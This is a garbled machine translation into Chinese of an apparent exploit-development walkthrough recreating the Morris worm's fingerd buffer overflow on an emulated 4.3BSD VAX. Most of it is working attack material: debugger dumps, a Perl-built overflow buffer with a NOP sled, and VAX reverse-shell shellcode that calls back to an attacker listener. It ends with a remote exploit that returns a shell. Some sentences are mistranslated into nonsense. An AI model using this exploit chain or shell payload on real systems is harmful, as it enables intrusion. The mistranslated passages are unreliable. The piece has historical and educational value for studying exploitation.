过去的狂暴幽灵:深入了解莫里斯蠕虫(一)

几个月前，我们通过删除三个新模块向Morris蠕虫病毒30周年致敬：

1. 一个缓冲区溢出的fingerd(8)
2. 一个VAX 反向shell
3. 一个命令注入 Sendmail中的调试代码

所有这些漏洞都是1988年被蠕虫利用的。

在这篇文章中，我们将深入探讨这些模块的漏洞利用开发过程，开始我们的旅程，构建一个4.3BSD系统进行测试，并通过将蠕虫作者的步骤撤回到RCE来完成它。在这篇文章的最后，有希望清楚的是，即使是30岁的黑人仍然能够教会我们现代的基础知识。

背景

让我们从这个奇怪的项目如何成为一个小历史开始。我记得在VX Heaven上读过有关Morris蠕虫的内容。很多年前，有些人可能还记得那个网站。快进到2018年，我忘记了蠕虫，直到我有机会完成Cliff Stoll的黑客追踪史诗“The Cuckoo's Egg”。在结语中，Stoll回顾了第一个互联网蠕虫。

值得注意的是，蠕虫运行了可以说是野外第一个恶意缓冲区溢出。它还利用Sendmail调试模式中的命令注入，管理员通常使用它来调试邮件问题。甚至超出技术范围，该蠕虫导致了计算机欺诈和滥用法案（CFAA）的第一次定罪 - 这是今天具有持久影响的先例。

感觉很有灵感，我开始了一个侧面项目，看看我是否可以使用句点工具来复制蠕虫的漏洞。但首先，我需要一个系统。

Ye olde 4.3BSD：现代时代的VAX

我们将在“真正的”4.3BSD系统上进行工作，但它将在SIMH模拟器中进行模拟，因为很难找到真正的VAX-11/780。如果你在DEF CON 17，你有机会玩现场演奏！

我冒昧地在Docker中自动化整个构建过程，所以请确保你拥有第一个。如果你很好奇，可以在计算机历史维基上找到手动构建过程，但我必须警告你这很乏味。

当您发现Docker环境仅expect(1)自动化SIMH以自动化ed(1)此处文档时，请不要感到惊讶。毕竟，ed是标准编辑器。

克隆存储库

首先，git clone将回购和cd进去。

wvu@kharak:~$ git clone https://github.com/wvu/ye-olde-bsd
Cloning into 'ye-olde-bsd'...
remote: Enumerating objects: 11, done.
remote: Counting objects: 100% (11/11), done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 11 (delta 1), reused 11 (delta 1), pack-reused 0
Unpacking objects: 100% (11/11), done.
wvu@kharak:~$ cd ye-olde-bsd
wvu@kharak:~/ye-olde-bsd:master$ ls -la
total 66776
drwxr-xr-x 12 wvu 2075806812 384 Dec 18 12:26 .
drwxr-xr-x+ 64 wvu 2075806812 2048 Dec 18 12:26 ..
-rw-r--r-- 1 wvu 2075806812 71 Dec 18 12:26 .dockerignore
drwxr-xr-x 12 wvu 2075806812 384 Dec 18 12:26 .git
-rw-r--r-- 1 wvu 2075806812 33617326 Dec 18 12:26 43.tap.gz
-rw-r--r-- 1 wvu 2075806812 1226 Dec 18 12:26 Dockerfile
-rw-r--r-- 1 wvu 2075806812 200 Dec 18 12:26 README.md
-rw-r--r-- 1 wvu 2075806812 295 Dec 18 12:26 boot.ini
-rw-r--r-- 1 wvu 2075806812 4331 Dec 18 12:26 boot42.gz
-rw-r--r-- 1 wvu 2075806812 211 Dec 18 12:26 install.ini
-rw-r--r-- 1 wvu 2075806812 534149 Dec 18 12:26 miniroot.gz
-rwxr-xr-x 1 wvu 2075806812 3499 Dec 18 12:26 setup.exp
wvu@kharak:~/ye-olde-bsd:master$ cat README.md
# Docker environment for 4.3BSD on VAX
```
docker build -t ye-olde-bsd .
docker run -itp 127.0.0.1:25:25 -p 127.0.0.1:79:79 ye-olde-bsd
```
https://github.com/rapid7/metasploit-framework/pull/10700
wvu@kharak:~/ye-olde-bsd:master$

建设4.3BSD

接下来，我们需要docker build图像。我们会将其标记为ye-olde-bsd以后更容易访问。你可能想要选择一个比我更有用的名字。

wvu@kharak:~/ye-olde-bsd:master$ docker build -t ye-olde-bsd .
Sending build context to Docker daemon 34.17MB
[snip]
Successfully tagged ye-olde-bsd:latest
wvu@kharak:~/ye-olde-bsd:master$

运行4.3BSD

现在，我们可以使用新建的4.3BSD系统运行模拟器。我们将转发端口fingerd和Sendmail，以便我们可以通过SIMH的虚拟NAT来利用它们。另外，我将CPU限制在10％--cpus .1，因为模拟器将要100％使用。这是一个可怕的电池消耗！

wvu@kharak:~/ye-olde-bsd:master$ docker run -itp 127.0.0.1:25:25 -p 127.0.0.1:79:79 --cpus .1 ye-olde-bsd
[snip]
4.3 BSD UNIX (simh) (console)
login: root
Dec 18 10:36:49 simh login: ROOT LOGIN console
4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986
Would you like to play a game?
Don't login as root, use su
simh#

继续以root身份登录并开始熟悉系统。如果您在我们最近的CTF中玩过2次钻石挑战，那么您可能已经熟悉了！

粉碎堆栈的乐趣和怀旧

如果我们查看fingerdin 的源代码/usr/src/etc/fingerd.c，我们会看到一个经典的基于堆栈的缓冲区溢出：一个512字节的缓冲区可以溢出gets(3)，它从标准输入读取并终止于换行符或EOF。该进程由inetd（8）运行，因此守护进程中不需要网络代码。这使我们可以轻松地进行单独测试。

simh# cat /usr/src/etc/fingerd.c
[snip]
 char line[512];
[snip]
 gets(line);
[snip]
simh#

那么，什么在缓冲区后被破坏？在x86中，它通常是保存的帧指针和保存的返回地址，后者我们需要覆盖它来执行代码。但是，在VAX中，在我们可以达到“EIP”或PC之前，堆栈上几乎没有额外的长字，在我们的例子中，其中一些长字对意外值很敏感。

我们感兴趣的堆栈框架部分如下所示：

+--------------------------+
| Condition handler |
+--------------------------+
| Register save mask, etc. |
+--------------------------+
| Argument pointer (AP) |
+--------------------------+
| Frame pointer (FP) |
+--------------------------+
| Program counter (PC) |
+--------------------------+

在我的测试中，我发现将导致保存的PC的四个长字归零是安全的。由于ret指令如何评估堆栈帧，在这些长字中保留设置位可能会阻碍代码执行。

因此，我们有512字节的数据，16字节的堆栈帧为零，4字节用于PC。这意味着总共532个字节。终止换行符可以省略，因为我们会点击EOF。

准备fingerd测试

自fingerd运行以来inetd，我们可以通过将数据发送到其标准输入来直接测试它。但是，getpeername(2)在运行时我们需要删除一个调用inetd。

首先要复制一份fingerd.c，因为你不想丢失原件。我们将在/tmp。

simh# cd /tmp
simh# cp /usr/src/etc/fingerd.c .
simh#

接下来，注释掉getpeername(2)条件。如果您正在使用vi(1)，则必须保存:wq!，因为该文件是只读的。编译fingerd.c与-g一旦你完成（调试符号）。

simh# vi fingerd.c
[Using open mode]
"fingerd.c" [Read only] 95 lines, 1695 characters
/*
/getpeername
 /*if (getpeername(0, &sin, &i) < 0)
 fatal(argv[0], "getpeername");*/
:wq!
"fingerd.c" 95 lines, 1699 characters
simh# cc fingerd.c -o fingerd -g
simh#

以旧式方式传输文件

让我们生成一个测试缓冲区并将其传输uuencode(1)。我习惯使用Perl，但可以随意使用您选择的语言。

0x03是bptVAX中的断点指令。如果我们遇到它，调试器将自动中断。它在测试时非常有用！AAAA是我们的新PC，你应该非常熟悉。

wvu@kharak:~$ perl -e 'print "\x03"x512 . "\x00"x16 . "AAAA"' | uuencode sploit.bin | ncat -lv 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

telnet(1)是4.3BSD上为数不多的几个命令之一，它将执行到任意主机和端口的TCP连接。让我们利用它uudecode(1)来下载我们的漏洞缓冲区。我们之前sploit.bin用它来命名uuencode。

simh# telnet 192.168.1.3 4444 | uudecode
Connection closed by foreign host.
simh#

调试和反汇编 dbx(1)

大多数人都熟悉GDB。你知道GDB是基于dbxBSD的吗？两者都是具有类似命令语法的符号调试器，因此大多数情况下转换应该很容易。

装载fingerd与dbx和设置断点上线85，这应该是一个return声明。使用exploit缓冲区运行程序。

simh# dbx fingerd
dbx version 3.21 of 6/5/86 16:40 (monet.Berkeley.EDU).
Type 'help' for help.
reading symbolic information ...
(dbx) stop at 85
[1] stop at 85
(dbx) r < sploit.bin
Login name: In real life: ???
[1] stopped in main at line 85
 85 return(0);
(dbx)

所以，我还没有找到一种方法来静态反汇编4.3BSD上的二进制文件。如果您知道某种方式，请告诉我！但是，我已经能够通过从PC转储指令来获得相同的结果。您可以通过调整断点或更改PC的偏移来调整反汇编（由于可变长度指令，风险较大）。

您可以通过从PC转储10条指令来查看此操作。

(dbx) ($pc)/10i
00000361 clrl r0
00000363 ret
00000364 ret
00000365 movab -568(sp),sp
0000036a brw 59
0000036d halt
0000036e halt
0000036f halt
00000370 brb 39c
00000372 pushl 4(ap)
(dbx)

步骤到下一条指令，应该是我们的ret。我们想在这里停下来进行记忆分析。

(dbx) nexti
stopped in main at 0x363
00000363 ret
(dbx)

从SP转储200个长字以检查我们的缓冲区。

(dbx) ($sp)/200X
7fffe908: 00002084 7fffe940 00000000 00000000
7fffe918: 00002338 00000000 00000079 00000003
7fffe928: 00000004 00000079 00000000 00000000
7fffe938: 00000000 00000000 03030303 03030303
7fffe948: 03030303 03030303 03030303 03030303
7fffe958: 03030303 03030303 03030303 03030303
7fffe968: 03030303 03030303 03030303 03030303
7fffe978: 03030303 03030303 03030303 03030303
7fffe988: 03030303 03030303 03030303 03030303
7fffe998: 03030303 03030303 03030303 03030303
7fffe9a8: 03030303 03030303 03030303 03030303
7fffe9b8: 03030303 03030303 03030303 03030303
7fffe9c8: 03030303 03030303 03030303 03030303
7fffe9d8: 03030303 03030303 03030303 03030303
7fffe9e8: 03030303 03030303 03030303 03030303
7fffe9f8: 03030303 03030303 03030303 03030303
7fffea08: 03030303 03030303 03030303 03030303
7fffea18: 03030303 03030303 03030303 03030303
7fffea28: 03030303 03030303 03030303 03030303
7fffea38: 03030303 03030303 03030303 03030303
7fffea48: 03030303 03030303 03030303 03030303
7fffea58: 03030303 03030303 03030303 03030303
7fffea68: 03030303 03030303 03030303 03030303
7fffea78: 03030303 03030303 03030303 03030303
7fffea88: 03030303 03030303 03030303 03030303
7fffea98: 03030303 03030303 03030303 03030303
7fffeaa8: 03030303 03030303 03030303 03030303
7fffeab8: 03030303 03030303 03030303 03030303
7fffeac8: 03030303 03030303 03030303 03030303
7fffead8: 03030303 03030303 03030303 03030303
7fffeae8: 03030303 03030303 03030303 03030303
7fffeaf8: 03030303 03030303 03030303 03030303
7fffeb08: 03030303 03030303 03030303 03030303
7fffeb18: 03030303 03030303 03030303 03030303
7fffeb28: 03030303 03030303 03030303 03030303
7fffeb38: 03030303 03030303 00000000 00000000
7fffeb48: 00000000 00000000 41414141 0002a900
7fffeb58: 00000003 00000001 7fffeb6c 7fffeb74
7fffeb68: 00000001 7fffeb8c 00000000 7fffeb94
7fffeb78: 7fffeb9b 7fffebaa 7fffebb7 7fffebc1
7fffeb88: 00000000 676e6966 00647265 454d4f48
7fffeb98: 53002f3d 4c4c4548 69622f3d 73632f6e
7fffeba8: 45540068 753d4d52 6f6e6b6e 55006e77
7fffebb8: 3d524553 746f6f72 54415000 652f3d48
7fffebc8: 2f3a6374 2f727375 3a626375 6e69622f
7fffebd8: 73752f3a 69622f72 752f3a6e 6c2f7273
7fffebe8: 6c61636f 73752f3a 6f682f72 3a737473
7fffebf8: 0000002e 00000000 7fffff6c ffffffff
7fffec08: ffffffff 7fffe908 0026b400 80058af8
7fffec18: 8007a140 7fffe830 00000013 00000003
(dbx)

从FP转储五个长字以检查我们的堆栈帧。注意归零的长字。如果您感到困惑，请查阅之前的堆栈图。

(dbx) ($fp)/5X
7fffeb40: 00000000 00000000 00000000 00000000
7fffeb50: 41414141
(dbx)

如果您的偏移是正确的，您可以单步执行ret并查看保存的PC是否已恢复。

(dbx) nexti
stopped in write at 0x41414141
41414141 escf
(dbx)

这是一个宾果游戏！从缓冲区中间选择一个返回地址。我会选0x7fffea38。请记住，由于堆栈布局可能不同，这可能不会对inetd-run 起作用fingerd。

下载具有估计返回地址的新漏洞利用缓冲区。

wvu@kharak:~$ perl -e 'print "\x03"x512 . "\x00"x16 . "\x38\xea\xff\x7f"' | uuencode sploit.bin | ncat -lv 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

启动dbx并开始踩踏。点击bpt指令后，您可以继续c进行验证。

simh# dbx fingerd
dbx version 3.21 of 6/5/86 16:40 (monet.Berkeley.EDU).
Type 'help' for help.
reading symbolic information ...
(dbx) stop at 85
[1] stop at 85
(dbx) r < sploit.bin
Login name: In real life: ???
[1] stopped in main at line 85
 85 return(0);
(dbx) nexti
stopped in main at 0x363
00000363 ret
(dbx) nexti
stopped in write at 0x7fffea38
7fffea38 bpt
(dbx) c
Trace/BPT trap in write at 0x7fffea38
7fffea38 bpt
(dbx)

如果你点击bpt指令，你就有了RCE。恭喜！现在我们只需要一个有效载荷。

VAX shellcoding非常正义

如果您之前编写过x86 shellcode，那么VAX shellcode将会轻而易举。但是，请考虑AT＆T语法。抱歉。

我将首先bsd/vax/shell_reverse_tcp从Metasploit 生成和分解无编码器的有效负载，因为手动编写shellcode相当繁琐。

wvu@kharak:~/metasploit-framework:master$ ./msfvenom -p bsd/vax/shell_reverse_tcp lhost=192.168.1.3 > bsd_vax_shell_reverse_tcp.bin
[-] No platform was selected, choosing Msf::Module::Platform::BSD from the payload
[-] No arch selected, selecting arch: vax from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 100 bytes
wvu@kharak:~/metasploit-framework:master$ gobjdump -Db binary -m vax bsd_vax_shell_reverse_tcp.bin
bsd_vax_shell_reverse_tcp.bin: file format binary
Disassembly of section .data:
00000000 <.data>:
 0:	dd 00 	pushl $0x0
 2:	dd 01 	pushl $0x1
 4:	dd 02 	pushl $0x2
 6:	dd 03 	pushl $0x3
 8:	d0 5e 5c 	movl sp,ap
 b:	bc 8f 61 00 	chmk $0x0061
 f:	d0 50 5a 	movl r0,r10
 12:	dd 00 	pushl $0x0
 14:	dd 00 	pushl $0x0
 16:	dd 8f c0 a8 	pushl $0x0301a8c0
 1a:	01 03
 1c:	dd 8f 02 00 	pushl $0x5c110002
 20:	11 5c
 22:	d0 5e 5b 	movl sp,r11
 25:	dd 10 	pushl $0x10
 27:	dd 5b 	pushl r11
 29:	dd 5a 	pushl r10
 2b:	dd 03 	pushl $0x3
 2d:	d0 5e 5c 	movl sp,ap
 30:	bc 8f 62 00 	chmk $0x0062
 34:	d0 00 5b 	movl $0x0,r11
 37:	dd 5b 	pushl r11
 39:	dd 5a 	pushl r10
 3b:	dd 02 	pushl $0x2
 3d:	d0 5e 5c 	movl sp,ap
 40:	bc 8f 5a 00 	chmk $0x005a
 44:	f3 02 5b ef 	aobleq $0x2,r11,0x37
 48:	dd 8f 2f 73 	pushl $0x0068732f
 4c:	68 00
 4e:	dd 8f 2f 62 	pushl $0x6e69622f
 52:	69 6e
 54:	d0 5e 5b 	movl sp,r11
 57:	dd 00 	pushl $0x0
 59:	dd 00 	pushl $0x0
 5b:	dd 5b 	pushl r11
 5d:	dd 03 	pushl $0x3
 5f:	d0 5e 5c 	movl sp,ap
 62:	bc 3b 	chmk $0x3b
wvu@kharak:~/metasploit-framework:master$

pushl而且movl应该很熟悉。chmk很像int 0x80。aobleq可能是需要解释的指令。你可以把它想象成loopx86中的指令。有一个限制，索引（寄存器）和位移（跳转）。我们将它用于dup(2)我们的文件描述符而不重复代码。它基本上是一个for循环。

这里的调用约定是在堆栈上推送参数，然后推送args的数量，将参数指针设置为堆栈指针，然后执行系统调用。听起来有点熟？唯一真正不同的是x86中缺少AP。

壳码动作非常像任何其他反向壳：配置有连接socket(2)，背面连接到与攻击者connect(2)，dup2(2)通过标准输入，输出和错误的套接字描述符，最后执行/bin/sh与execve(2)。

让我们自己帮个忙，并将这个预制的shellcode转换为十六进制转义字节，以便我们利用。（echo纯粹是为了可读性。）

wvu@kharak:~/metasploit-framework:master$ echo "$(hexdump -ve '"\\\x" 1/1 "%02x"' bsd_vax_shell_reverse_tcp.bin)"
\xdd\x00\xdd\x01\xdd\x02\xdd\x03\xd0\x5e\x5c\xbc\x8f\x61\x00\xd0\x50\x5a\xdd\x00\xdd\x00\xdd\x8f\xc0\xa8\x01\x03\xdd\x8f\x02\x00\x11\x5c\xd0\x5e\x5b\xdd\x10\xdd\x5b\xdd\x5a\xdd\x03\xd0\x5e\x5c\xbc\x8f\x62\x00\xd0\x00\x5b\xdd\x5b\xdd\x5a\xdd\x02\xd0\x5e\x5c\xbc\x8f\x5a\x00\xf3\x02\x5b\xef\xdd\x8f\x2f\x73\x68\x00\xdd\x8f\x2f\x62\x69\x6e\xd0\x5e\x5b\xdd\x00\xdd\x00\xdd\x5b\xdd\x03\xd0\x5e\x5c\xbc\x3b
wvu@kharak:~/metasploit-framework:master$

把它们放在一起

您可能以前没有注意到它，但是在我们的shellcode和我们的假堆栈帧之间存在大约109个字节的缓冲区损坏。我们现在可以用任何非换行符填充它。你必须相信我（但我希望我错了）。它可能只需要一个堆栈枢轴。

将0x03 bpt指令更改为a 0x01 nop，我们可以跳到我们的shellcode。下载新的漏洞利用缓冲区。

wvu@kharak:~$ perl -e 'print "\x01"x303 . "\xdd\x00\xdd\x01\xdd\x02\xdd\x03\xd0\x5e\x5c\xbc\x8f\x61\x00\xd0\x50\x5a\xdd\x00\xdd\x00\xdd\x8f\xc0\xa8\x01\x03\xdd\x8f\x02\x00\x11\x5c\xd0\x5e\x5b\xdd\x10\xdd\x5b\xdd\x5a\xdd\x03\xd0\x5e\x5c\xbc\x8f\x62\x00\xd0\x00\x5b\xdd\x5b\xdd\x5a\xdd\x02\xd0\x5e\x5c\xbc\x8f\x5a\x00\xf3\x02\x5b\xef\xdd\x8f\x2f\x73\x68\x00\xdd\x8f\x2f\x62\x69\x6e\xd0\x5e\x5b\xdd\x00\xdd\x00\xdd\x5b\xdd\x03\xd0\x5e\x5c\xbc\x3b" . "A"x109 . "\x00"x16 . "\x38\xea\xff\x7f"' | uuencode sploit.bin | ncat -lv 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

设置ncat(1)捕获shell。

wvu@kharak:~$ ncat -lkv 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

并且fingerd这次直接使用漏洞缓冲区执行。

simh# ./fingerd < sploit.bin
Login name: ] In real life: ???

检查ncat选项卡或窗口。

Ncat: Connection from 192.168.1.3.
Ncat: Connection from 192.168.1.3:49285.
/usr/ucb/whoami
root

我们有一个壳！做一些PATH=/bin:/usr/bin:/usr/ucb:/etc; export PATH让你的新shell更有用的东西可能会有所帮助。您还可以script /dev/null用来生成PTY。

让我们抓住机会尝试远程攻击，假设堆栈布局足够接近。

wvu@kharak:~$ perl -e 'print "\x01"x303 . "\xdd\x00\xdd\x01\xdd\x02\xdd\x03\xd0\x5e\x5c\xbc\x8f\x61\x00\xd0\x50\x5a\xdd\x00\xdd\x00\xdd\x8f\xc0\xa8\x01\x03\xdd\x8f\x02\x00\x11\x5c\xd0\x5e\x5b\xdd\x10\xdd\x5b\xdd\x5a\xdd\x03\xd0\x5e\x5c\xbc\x8f\x62\x00\xd0\x00\x5b\xdd\x5b\xdd\x5a\xdd\x02\xd0\x5e\x5c\xbc\x8f\x5a\x00\xf3\x02\x5b\xef\xdd\x8f\x2f\x73\x68\x00\xdd\x8f\x2f\x62\x69\x6e\xd0\x5e\x5b\xdd\x00\xdd\x00\xdd\x5b\xdd\x03\xd0\x5e\x5c\xbc\x3b" . "A"x109 . "\x00"x16 . "\x38\xea\xff\x7f"' | ncat -v 127.0.0.1 79
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Connected to 127.0.0.1:79.
Ncat: 532 bytes sent, 0 bytes received in 0.25 seconds.
wvu@kharak:~$
Ncat: Connection from 192.168.1.3.
Ncat: Connection from 192.168.1.3:49308.
/usr/ucb/whoami
nobody

热潮，（无特权）贝壳。我们稍后会根据这个方框。